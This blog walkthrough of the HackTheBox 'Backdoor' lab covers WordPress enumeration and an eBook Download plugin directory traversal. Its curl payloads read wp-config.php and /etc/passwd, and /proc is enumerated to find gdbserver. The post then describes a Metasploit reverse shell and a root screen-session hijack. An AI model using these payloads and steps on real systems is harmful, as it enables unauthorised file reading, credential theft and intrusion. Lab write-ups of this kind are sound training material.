Backdoor from HackTheBox — Detailed Walkthrough

Showing all the tools and techniques needed to complete the box.

Machine Information

Backdoor from HackTheBox

Backdoor is an easy machine on HackTheBox. We start by finding a basic WordPress site with a vulnerable plugin. This allows directory traversal and local file inclusion, which we use to leak data and spy on processes. From this we find a vulnerable version of gdbserver which we exploit using Meterpreter to get a reverse shell. From there we find a detached screen session that we connect to and gain root.

Skills required are web and OS enumeration. Skills learned are finding and exploiting vulnerable software.

Hack The Box :: Penetration Testing Labs

Initial Recon

As always let’s start with Nmap:

Nmap scan of the Backdoor box

Three ports found initially. 1337 looks interesting as that’s a little unusual, however let’s start with Apache on port 80. First add the server IP to my hosts file:

┌──(root💀kali)-[~/htb/backdoor]
└─# echo “10.10.11.125 backdoor.htb” >> /etc/hosts

WordPress

We find a basic WordPress site:

Backdoor website

There’s no content here, let’s look for subfolders:

┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:13:41 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [–> http://backdoor.htb/wp-content/]
/wp-admin (Status: 301) [Size: 315] [–> http://backdoor.htb/wp-admin/]
/wp-includes (Status: 301) [Size: 318] [–> http://backdoor.htb/wp-includes/]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/12/08 22:15:21 Finished
===============================================================

From those subfolders the interesting one is wp-content, let’s check that one out:

┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb/wp-content -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:16:12 Starting gobuster in directory enumeration mode
===============================================================
/plugins (Status: 301) [Size: 325] [–> http://backdoor.htb/wp-content/plugins/]
/themes (Status: 301) [Size: 324] [–> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [–> http://backdoor.htb/wp-content/uploads/]
/upgrade (Status: 301) [Size: 325] [–> http://backdoor.htb/wp-content/upgrade/]
===============================================================
2021/12/08 22:17:50 Finished
===============================================================

Looking in plugins we find this:

ebook-download plugin folder

Searchsploit

Searchsploit gives us something useful:

Searchsploit check for exploits

Let’s check it out:

┌──(root💀kali)-[~/htb/backdoor]
└─# searchsploit -m php/webapps/39575.txt
Exploit: WordPress Plugin eBook Download 1.1 – Directory Traversal
URL: https://www.exploit-db.com/exploits/39575
Path: /usr/share/exploitdb/exploits/php/webapps/39575.txt
File Type: ASCII text

Copied to: /root/39575.txt

┌──(root💀kali)-[~/htb/backdoor]
└─# cat 39575.txt
# Exploit Title: WordPress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================

[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

Exploiting Plugin

So we have simple directory traversal and local file inclusion (LFI) vulnerabilities. Let’s try the example given above:

Using curl to read remote files

That works, let’s grab passwd:

┌──(root💀kali)-[~/htb/backdoor]
└─# curl http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
<SNIP>
user:x:1000:1000:user:/home/user:/bin/bash

Spying On Processes

That also works and we see just root and user as accounts we might be interested in.

In the earlier nmap scan we saw port 1337 was open. With the ability to read arbitrary files we can check out /proc and see what processes are running on the box. This explains more on how the /proc pseudo-filesystem works.

I used a simple loop to incrementally check /proc:

Using curl to spy on processes

We find two interesting things. Port 1337 is running gdbserver, which is our path to getting a foothold. We can also see screen is running with a detached session, we’ll come back to that later.

Meterpreter

A quick search for gdb exploits found this article for a Metasploit method. Let’s try that:

Exploiting box using Meterpreter

We have a session connected, now start a shell:

meterpreter > shell
Process 2402 created.
Channel 1 created.
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
user@Backdoor:~$

User Flag

With our shell stabilised let’s grab the user flag:

user@Backdoor:~$ id
id
uid=1000(user) gid=1000(user) groups=1000(user)

user@Backdoor:~$ ls -l
-rw-r—– 1 root user 33 Dec 9 23:17 user.txt

user@Backdoor:~$ cat user.txt
<HIDDEN>

Privilege Escalation

The path to root is simple, but only if you paid attention earlier. When we scanned the processes running on the box remotely we saw this:

/proc/814/cmdline/proc/814/cmdline/proc/814/cmdline/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root ;; done

This shows us that screen is running with a session detached called root. So it’s pretty safe to assume we just need to attach to that screen to get our root shell.

This explains what screen is and the parameters it uses, these are the ones we can see are in use:

-d -m Start screen in “detached” mode. This creates a new session but doesn’t attach to it. This is useful for system startup scripts.
-S sessionname

So this is nice and simple:

user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
Please set a terminal type.

Set terminal and then try again:

user@Backdoor:~$ export TERM=xterm
export TERM=xterm
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
root@Backdoor:~#

Root Flag

And there we are, let’s grab that root flag:

root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)

root@Backdoor:~# ls -l
-rw-r–r– 1 root root 33 Dec 9 23:17 root.txt

root@Backdoor:~# cat root.txt
<HIDDEN>

All done. See you next time.

Twitter — https://twitter.com/pencer_io
Website — https://pencer.io

Originally published at https://pencer.io on April 26, 2022.

Backdoor from HackTheBox — Detailed Walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.